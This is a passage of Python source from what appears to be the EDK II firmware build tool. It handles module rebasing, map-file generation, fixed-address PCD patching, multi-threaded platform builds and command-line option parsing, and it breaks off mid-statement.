LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
else:
#
# Set new address to the section header only for SMM driver.
#
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
#
# Collect funtion address from Map file
#
ImageMapTable = ModuleOutputImage.replace('.efi', '.map')
FunctionList = []
if os.path.exists(ImageMapTable):
OrigImageBaseAddress = 0
ImageMap = open (ImageMapTable, 'r')
for LinStr in ImageMap:
if len (LinStr.strip()) == 0:
continue
#
# Get the preferred address set on link time.
#
if LinStr.find ('Preferred load address is') != -1:
StrList = LinStr.split()
OrigImageBaseAddress = int (StrList[len(StrList) - 1], 16)
StrList = LinStr.split()
if len (StrList) > 4:
if StrList[3] == 'f' or StrList[3] =='F':
Name = StrList[1]
RelativeAddress = int (StrList[2], 16) - OrigImageBaseAddress
FunctionList.append ((Name, RelativeAddress))
if ModuleInfo.Arch == 'IPF' and Name.endswith('_ModuleEntryPoint'):
#
# Get the real entry point address for IPF image.
#
ModuleInfo.Image.EntryPoint = RelativeAddress
ImageMap.close()
#
# Add general information.
#
if ModeIsSmm:
MapBuffer.write('\n\n%s (Fixed SMRAM Offset, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
elif AddrIsOffset:
MapBuffer.write('\n\n%s (Fixed Memory Offset, BaseAddress=-0x%010X, EntryPoint=-0x%010X)\n' % (ModuleName, 0 - BaseAddress, 0 - (BaseAddress + ModuleInfo.Image.EntryPoint)))
else:
MapBuffer.write('\n\n%s (Fixed Memory Address, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
#
# Add guid and general seciton section.
#
TextSectionAddress = 0
DataSectionAddress = 0
for SectionHeader in ModuleInfo.Image.SectionHeaderList:
if SectionHeader[0] == '.text':
TextSectionAddress = SectionHeader[1]
elif SectionHeader[0] in ['.data', '.sdata']:
DataSectionAddress = SectionHeader[1]
if AddrIsOffset:
MapBuffer.write('(GUID=%s, .textbaseaddress=-0x%010X, .databaseaddress=-0x%010X)\n' % (ModuleInfo.Guid, 0 - (BaseAddress + TextSectionAddress), 0 - (BaseAddress + DataSectionAddress)))
else:
MapBuffer.write('(GUID=%s, .textbaseaddress=0x%010X, .databaseaddress=0x%010X)\n' % (ModuleInfo.Guid, BaseAddress + TextSectionAddress, BaseAddress + DataSectionAddress))
#
# Add debug image full path.
#
MapBuffer.write('(IMAGE=%s)\n\n' % (ModuleDebugImage))
#
# Add funtion address
#
for Function in FunctionList:
if AddrIsOffset:
MapBuffer.write(' -0x%010X %s\n' % (0 - (BaseAddress + Function[1]), Function[0]))
else:
MapBuffer.write(' 0x%010X %s\n' % (BaseAddress + Function[1], Function[0]))
ImageMap.close()
#
# for SMM module in SMRAM, the SMRAM will be allocated from base to top.
#
if ModeIsSmm:
BaseAddress = BaseAddress + ModuleInfo.Image.Size
## Collect MAP information of all FVs
#
def _CollectFvMapBuffer (self, MapBuffer, Wa, ModuleList):
if self.Fdf:
# First get the XIP base address for FV map file.
GuidPattern = re.compile("[-a-fA-F0-9]+")
GuidName = re.compile("\(GUID=[-a-fA-F0-9]+")
for FvName in Wa.FdfProfile.FvDict.keys():
FvMapBuffer = os.path.join(Wa.FvDir, FvName + '.Fv.map')
if not os.path.exists(FvMapBuffer):
continue
FvMap = open(FvMapBuffer, 'r')
#skip FV size information
FvMap.readline()
FvMap.readline()
FvMap.readline()
FvMap.readline()
for Line in FvMap:
MatchGuid = GuidPattern.match(Line)
if MatchGuid != None:
#
# Replace GUID with module name
#
GuidString = MatchGuid.group()
if GuidString.upper() in ModuleList:
Line = Line.replace(GuidString, ModuleList[GuidString.upper()].Name)
MapBuffer.write('%s' % (Line))
#
# Add the debug image full path.
#
MatchGuid = GuidName.match(Line)
if MatchGuid != None:
GuidString = MatchGuid.group().split("=")[1]
if GuidString.upper() in ModuleList:
MapBuffer.write('(IMAGE=%s)\n' % (os.path.join(ModuleList[GuidString.upper()].DebugDir, ModuleList[GuidString.upper()].Name + '.efi')))
FvMap.close()
## Collect MAP information of all modules
#
def _CollectModuleMapBuffer (self, MapBuffer, ModuleList):
sys.stdout.write ("Generate Load Module At Fix Address Map")
sys.stdout.flush()
PatchEfiImageList = []
PeiModuleList = {}
BtModuleList = {}
RtModuleList = {}
SmmModuleList = {}
PeiSize = 0
BtSize = 0
RtSize = 0
# reserve 4K size in SMRAM to make SMM module address not from 0.
SmmSize = 0x1000
IsIpfPlatform = False
if 'IPF' in self.ArchList:
IsIpfPlatform = True
for ModuleGuid in ModuleList:
Module = ModuleList[ModuleGuid]
GlobalData.gProcessingFile = "%s [%s, %s, %s]" % (Module.MetaFile, Module.Arch, Module.ToolChain, Module.BuildTarget)
OutputImageFile = ''
for ResultFile in Module.CodaTargetList:
if str(ResultFile.Target).endswith('.efi'):
#
# module list for PEI, DXE, RUNTIME and SMM
#
OutputImageFile = os.path.join(Module.OutputDir, Module.Name + '.efi')
ImageClass = PeImageClass (OutputImageFile)
if not ImageClass.IsValid:
EdkLogger.error("build", FILE_PARSE_FAILURE, ExtraData=ImageClass.ErrorInfo)
ImageInfo = PeImageInfo(Module.Name, Module.Guid, Module.Arch, Module.OutputDir, Module.DebugDir, ImageClass)
if Module.ModuleType in ['PEI_CORE', 'PEIM', 'COMBINED_PEIM_DRIVER','PIC_PEIM', 'RELOCATABLE_PEIM', 'DXE_CORE']:
PeiModuleList[Module.MetaFile] = ImageInfo
PeiSize += ImageInfo.Image.Size
elif Module.ModuleType in ['BS_DRIVER', 'DXE_DRIVER', 'UEFI_DRIVER']:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
elif Module.ModuleType in ['DXE_RUNTIME_DRIVER', 'RT_DRIVER', 'DXE_SAL_DRIVER', 'SAL_RT_DRIVER']:
RtModuleList[Module.MetaFile] = ImageInfo
#IPF runtime driver needs to be at 2 page alignment.
if IsIpfPlatform and ImageInfo.Image.Size % 0x2000 != 0:
ImageInfo.Image.Size = (ImageInfo.Image.Size / 0x2000 + 1) * 0x2000
RtSize += ImageInfo.Image.Size
elif Module.ModuleType in ['SMM_CORE', 'DXE_SMM_DRIVER']:
SmmModuleList[Module.MetaFile] = ImageInfo
SmmSize += ImageInfo.Image.Size
if Module.ModuleType == 'DXE_SMM_DRIVER':
PiSpecVersion = '0x00000000'
if 'PI_SPECIFICATION_VERSION' in Module.Module.Specification:
PiSpecVersion = Module.Module.Specification['PI_SPECIFICATION_VERSION']
# for PI specification < PI1.1, DXE_SMM_DRIVER also runs as BOOT time driver.
if int(PiSpecVersion, 16) < 0x0001000A:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
break
#
# EFI image is final target.
# Check EFI image contains patchable FixAddress related PCDs.
#
if OutputImageFile != '':
ModuleIsPatch = False
for Pcd in Module.ModulePcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_LIST:
ModuleIsPatch = True
break
if not ModuleIsPatch:
for Pcd in Module.LibraryPcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_LIST:
ModuleIsPatch = True
break
if not ModuleIsPatch:
continue
#
# Module includes the patchable load fix address PCDs.
# It will be fixed up later.
#
PatchEfiImageList.append (OutputImageFile)
#
# Get Top Memory address
#
ReservedRuntimeMemorySize = 0
TopMemoryAddress = 0
if self.LoadFixAddress == 0xFFFFFFFFFFFFFFFF:
TopMemoryAddress = 0
else:
TopMemoryAddress = self.LoadFixAddress
if TopMemoryAddress < RtSize + BtSize + PeiSize:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is too low to load driver")
# Make IPF runtime driver at 2 page alignment.
if IsIpfPlatform:
ReservedRuntimeMemorySize = TopMemoryAddress % 0x2000
RtSize = RtSize + ReservedRuntimeMemorySize
#
# Patch FixAddress related PCDs into EFI image
#
for EfiImage in PatchEfiImageList:
EfiImageMap = EfiImage.replace('.efi', '.map')
if not os.path.exists(EfiImageMap):
continue
#
# Get PCD offset in EFI image by GenPatchPcdTable function
#
PcdTable = parsePcdInfoFromMapFile(EfiImageMap, EfiImage)
#
# Patch real PCD value by PatchPcdValue tool
#
for PcdInfo in PcdTable:
ReturnValue = 0
if PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE_DATA_TYPE, str (PeiSize/0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE_DATA_TYPE, str (BtSize/0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE_DATA_TYPE, str (RtSize/0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE and len (SmmModuleList) > 0:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE_DATA_TYPE, str (SmmSize/0x1000))
if ReturnValue != 0:
EdkLogger.error("build", PARAMETER_INVALID, "Patch PCD value failed", ExtraData=ErrorInfo)
MapBuffer.write('PEI_CODE_PAGE_NUMBER = 0x%x\n' % (PeiSize/0x1000))
MapBuffer.write('BOOT_CODE_PAGE_NUMBER = 0x%x\n' % (BtSize/0x1000))
MapBuffer.write('RUNTIME_CODE_PAGE_NUMBER = 0x%x\n' % (RtSize/0x1000))
if len (SmmModuleList) > 0:
MapBuffer.write('SMM_CODE_PAGE_NUMBER = 0x%x\n' % (SmmSize/0x1000))
PeiBaseAddr = TopMemoryAddress - RtSize - BtSize
BtBaseAddr = TopMemoryAddress - RtSize
RtBaseAddr = TopMemoryAddress - ReservedRuntimeMemorySize
self._RebaseModule (MapBuffer, PeiBaseAddr, PeiModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, BtBaseAddr, BtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, RtBaseAddr, RtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, 0x1000, SmmModuleList, AddrIsOffset = False, ModeIsSmm = True)
MapBuffer.write('\n\n')
sys.stdout.write ("\n")
sys.stdout.flush()
## Save platform Map file
#
def _SaveMapFile (self, MapBuffer, Wa):
#
# Map file path is got.
#
MapFilePath = os.path.join(Wa.BuildDir, Wa.Name + '.map')
#
# Save address map into MAP file.
#
SaveFileOnChange(MapFilePath, MapBuffer.getvalue(), False)
MapBuffer.close()
if self.LoadFixAddress != 0:
sys.stdout.write ("\nLoad Module At Fix Address Map file can be found at %s\n" %(MapFilePath))
sys.stdout.flush()
## Build active platform for different build targets and different tool chains
#
def _BuildPlatform(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
self.Progress.Stop("done!")
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma == None:
continue
self.BuildModules.append(Ma)
self._BuildPa(self.Target, Pa)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma == None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = StringIO('')
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# create FDS again for the updated EFI image
#
self._Build("fds", Wa)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
## Build active module for different build targets, different tool chains and different archs
#
def _BuildModule(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
#
# module build needs platform build information, so get platform
# AutoGen first
#
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress,
self.ModuleFile
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
Wa.CreateMakeFile(False)
self.Progress.Stop("done!")
MaList = []
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Ma = ModuleAutoGen(Wa, self.ModuleFile, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma == None: continue
MaList.append(Ma)
self.BuildModules.append(Ma)
if not Ma.IsBinaryModule:
self._Build(self.Target, Ma, BuildModule=True)
self.BuildReport.AddPlatformReport(Wa, MaList)
if MaList == []:
EdkLogger.error(
'build',
BUILD_ERROR,
"Module for [%s] is not a component of active platform."\
" Please make sure that the ARCH and inf file path are"\
" given in the same as in [%s]" %\
(', '.join(Wa.ArchList), self.PlatformFile),
ExtraData=self.ModuleFile
)
# Create MAP file when Load Fix Address is enabled.
if self.Target == "fds" and self.Fdf:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma == None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = StringIO('')
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
#
# create FDS again for the updated EFI image
#
self._Build("fds", Wa)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
## Build a platform in multi-thread mode
#
def _MultiThreadBuildPlatform(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
Wa.CreateMakeFile(False)
# multi-thread exit flag
ExitFlag = threading.Event()
ExitFlag.clear()
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
if Pa == None:
continue
ModuleList = []
for Inf in Pa.Platform.Modules:
ModuleList.append(Inf)
# Add the INF only list in FDF
if GlobalData.gFdfParser != None:
for InfName in GlobalData.gFdfParser.Profile.InfList:
Inf = PathClass(NormPath(InfName), self.WorkspaceDir, Arch)
if Inf in Pa.Platform.Modules:
continue
ModuleList.append(Inf)
for Module in ModuleList:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma == None:
continue
# Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
Ma.CreateCodeFile(True)
if self.Target == "genc":
continue
if not self.SkipAutoGen or self.Target == 'genmake':
Ma.CreateMakeFile(True)
if self.Target == "genmake":
continue
self.BuildModules.append(Ma)
self.Progress.Stop("done!")
for Ma in self.BuildModules:
# Generate build task for the module
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
# in case there's an interruption. we need a full version of makefile for platform
Pa.CreateMakeFile(False)
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
#
# Save temp tables to a TmpTableDict.
#
for Key in Wa.BuildDatabase._CACHE_:
if Wa.BuildDatabase._CACHE_[Key]._RawData and Wa.BuildDatabase._CACHE_[Key]._RawData._Table and Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table:
if TemporaryTablePattern.match(Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table):
TmpTableDict[Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table] = Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Cur
#
#
# All modules have been put in build tasks queue. Tell task scheduler
# to exit if all tasks are completed
#
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
#
# Check for build error, and raise exception if one
# has been signaled.
#
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma == None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
#
# Rebase module to the preferred memory address before GenFds
#
MapBuffer = StringIO('')
if self.LoadFixAddress != 0:
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# Generate FD image if there's a FDF file found
#
LaunchCommand(Wa.GenFdsCommand, os.getcwd())
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile(MapBuffer, Wa)
## Generate GuidedSectionTools.txt in the FV directories.
#
def CreateGuidedSectionToolsFile(self):
for BuildTarget in self.BuildTargetList:
for ToolChain in self.ToolChainList:
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag
)
FvDir = Wa.FvDir
if not os.path.exists(FvDir):
continue
for Arch in self.ArchList:
# Build up the list of supported architectures for this build
prefix = '%s_%s_%s_' % (BuildTarget, ToolChain, Arch)
# Look through the tool definitions for GUIDed tools
guidAttribs = []
for (attrib, value) in self.ToolDef.ToolsDefTxtDictionary.iteritems():
if attrib.upper().endswith('_GUID'):
split = attrib.split('_')
thisPrefix = '_'.join(split[0:3]) + '_'
if thisPrefix == prefix:
guid = self.ToolDef.ToolsDefTxtDictionary[attrib]
guid = guid.lower()
toolName = split[3]
path = '_'.join(split[0:4]) + '_PATH'
path = self.ToolDef.ToolsDefTxtDictionary[path]
path = self.GetFullPathOfTool(path)
guidAttribs.append((guid, toolName, path))
# Write out GuidedSecTools.txt
toolsFile = os.path.join(FvDir, 'GuidedSectionTools.txt')
toolsFile = open(toolsFile, 'wt')
for guidedSectionTool in guidAttribs:
print >> toolsFile, ' '.join(guidedSectionTool)
toolsFile.close()
## Returns the full path of the tool.
#
def GetFullPathOfTool (self, tool):
if os.path.exists(tool):
return os.path.realpath(tool)
else:
# We need to search for the tool using the
# PATH environment variable.
for dirInPath in os.environ['PATH'].split(os.pathsep):
foundPath = os.path.join(dirInPath, tool)
if os.path.exists(foundPath):
return os.path.realpath(foundPath)
# If the tool was not found in the path then we just return
# the input tool.
return tool
## Launch the module or platform build
#
def Launch(self):
if not self.ModuleFile:
if not self.SpawnMode or self.Target not in ["", "all"]:
self.SpawnMode = False
self._BuildPlatform()
else:
self._MultiThreadBuildPlatform()
self.CreateGuidedSectionToolsFile()
else:
self.SpawnMode = False
self._BuildModule()
if self.Target == 'cleanall':
self.Db.Close()
RemoveDirectory(os.path.dirname(GlobalData.gDatabasePath), True)
def CreateAsBuiltInf(self):
for Module in self.BuildModules:
Module.CreateAsBuiltInf()
self.BuildModules = []
## Do some clean-up works when error occurred
def Relinquish(self):
OldLogLevel = EdkLogger.GetLevel()
EdkLogger.SetLevel(EdkLogger.ERROR)
#self.DumpBuildData()
Utils.Progressor.Abort()
if self.SpawnMode == True:
BuildTask.Abort()
EdkLogger.SetLevel(OldLogLevel)
def DumpBuildData(self):
CacheDirectory = os.path.dirname(GlobalData.gDatabasePath)
Utils.CreateDirectory(CacheDirectory)
Utils.DataDump(Utils.gFileTimeStampCache, os.path.join(CacheDirectory, "gFileTimeStampCache"))
Utils.DataDump(Utils.gDependencyDatabase, os.path.join(CacheDirectory, "gDependencyDatabase"))
def RestoreBuildData(self):
FilePath = os.path.join(os.path.dirname(GlobalData.gDatabasePath), "gFileTimeStampCache")
if Utils.gFileTimeStampCache == {} and os.path.isfile(FilePath):
Utils.gFileTimeStampCache = Utils.DataRestore(FilePath)
if Utils.gFileTimeStampCache == None:
Utils.gFileTimeStampCache = {}
FilePath = os.path.join(os.path.dirname(GlobalData.gDatabasePath), "gDependencyDatabase")
if Utils.gDependencyDatabase == {} and os.path.isfile(FilePath):
Utils.gDependencyDatabase = Utils.DataRestore(FilePath)
if Utils.gDependencyDatabase == None:
Utils.gDependencyDatabase = {}
def ParseDefines(DefineList=[]):
DefineDict = {}
if DefineList != None:
for Define in DefineList:
DefineTokenList = Define.split("=", 1)
if not GlobalData.gMacroNamePattern.match(DefineTokenList[0]):
EdkLogger.error('build', FORMAT_INVALID,
"The macro name must be in the pattern [A-Z][A-Z0-9_]*",
ExtraData=DefineTokenList[0])
if len(DefineTokenList) == 1:
DefineDict[DefineTokenList[0]] = "TRUE"
else:
DefineDict[DefineTokenList[0]] = DefineTokenList[1].strip()
return DefineDict
gParamCheck = []
def SingleCheckCallback(option, opt_str, value, parser):
if option not in gParamCheck:
setattr(parser.values, option.dest, value)
gParamCheck.append(option)
else:
parser.error("Option %s only allows one instance in command line!" % option)
## Parse command line options
#
# Using standard Python module optparse to parse command line option of this tool.
#
# @retval Opt A optparse.Values object containing the parsed options
# @retval Args Target of build command
#
def MyOptionParser():
Parser = OptionParser(description=__copyright__,version=__version__,prog="build.exe",usage="%prog [options] [all|fds|genc|genmake|clean|cleanall|cleanlib|modules|libraries|run]")
Parser.add_option("-a", "--arch", action="append", type="choice", choices=['IA32','X64','IPF','EBC','ARM', 'AARCH64'], dest="TargetArch",
help="ARCHS is one of list: IA32, X64, IPF, ARM, AARCH64 or EBC, which overrides target.txt's TARGET_ARCH definition. To specify more archs, please repeat this option.")
Parser.add_option("-p", "--platform", action="callback", type="string", dest="PlatformFile", callback=SingleCheckCallback,
help="Build the platform specified by the DSC file name argument, overriding target.txt's ACTIVE_PLATFORM definition.")
Parser.add_option("-m", "--module", action="callback", type="string", dest="ModuleFile", callback=SingleCheckCallback,
help="Build the module specified by the INF file name argument.")
Parser.add_option("-b", "--buildtarget", type="string", dest="BuildTarget", help="Using the TARGET to build the platform, overriding target.txt's TARGET definition.",
action="append")
Parser.add_option("-t", "--tagname", action="append", type="string", dest="ToolChain",
help="Using the Tool Chain Tagname to build the platform, overriding target.txt's TOOL_CHAIN_TAG definition.")
Parser.add_option("-x", "--sku-id", action="callback", type="string", dest="SkuId", callback=SingleCheckCallback,
help="Using this name of SKU ID to build the platform, overriding SKUID_IDENTIFIER in DSC file.")
Parser.add_option("-n", action="callback", type="int", dest="ThreadNumber", callback=SingleCheckCallback,
help="Build the platform using multi-threaded compiler. The value overrides target.txt's MAX_CONCURRENT_THREAD_NUMBER. Less than 2 will disable multi-thread builds.")
Parser.add_option("-f", "--fdf", action="callback", type="string", dest="FdfFile", callback=SingleCheckCallback,
help="The name of the FDF file to use, which overrides the setting in the DSC file.")
Parser.add_option("-r", "--rom-image", action="append", type="string", dest="RomImage", default=[],
help="The name of FD to be generated. The name must be from [FD] section in FDF file.")
Parser.add_option("-i", "--fv-image", action="append", type="string", dest="FvImage", default=[],
help="The name of FV to be generated. The name must be from [FV] section in FDF file.")
Parser.add_option("-C", "--capsule-image", action="append", type="string", dest="CapName", default=[],
help="The name of Capsule to be generated. The name must be from [Capsule] section in FDF file.")
Parser.add_option("-u", "--skip-autogen", action="store_true", dest="SkipAutoGen", help="Skip AutoGen step.")
Parser.add_option("-e", "--re-parse", action="store_true", dest="Reparse", help="Re-parse all meta-data files.")
Parser.add_option("-c", "--case-insensitive", action="store_true", dest="CaseInsensitive", default=False, help="Don't check case of file name.")
Parser.add_option("-w", "--warning-as-error", action="store_true", dest="WarningAsError", help="Treat warning in tools as error.")
Parser.add_option("-j", "--log", action="store", dest="LogFile", help="Put log in specified file as well as on console.")
Parser.add_option("-s", "--silent", action="store_true", type=None, dest="SilentMode",
help="Make use of silent mode of (n)make.")
Parser.add_option("-q", "--quiet", action="store_true", type=None, help="Disable all messages except FATAL ERRORS.")
Parser.add_option("-v", "--verbose", action="store_true", type=None, help="Turn on verbose output with informational messages printed, "\
"including library instances selected, final dependency expression, "\
"and warning messages, etc.")
Parser.add_option("-d", "--debug", action="store", type="int", help="Enable debug messages at specified level.")
Parser.add_option("-D", "--define", action="append", type="string", dest="Macros", help="Macro: \"Name [= Value]\".")
Parser.add_option("-y", "--report-file", action="store", dest="ReportFile", help="Create/overwrite the report to the specified filename.")
Parser.add_option("-Y", "--report-type", action="append", type="choice", choices=['PCD','LIBRARY','FLASH','DEPEX','BUILD_FLAGS','FIXED_ADDRESS', 'EXECUTION_ORDER'], dest="ReportType", default=[],
help="Flags that control the type of build report to generate. Must be one of: [PCD, LIBRARY, FLASH, DEPEX, BUILD_FLAGS, FIXED_ADDRESS, EXECUTION_ORDER]. "\
"To specify more than one flag, repeat this option on the command line and the default flag set is [PCD, LIBRARY, FLASH, DEPEX, BUILD_FLAGS, FIXED_ADDRESS]")
Parser.add_option("-F", "--flag", action="store", type="string", dest="Flag",
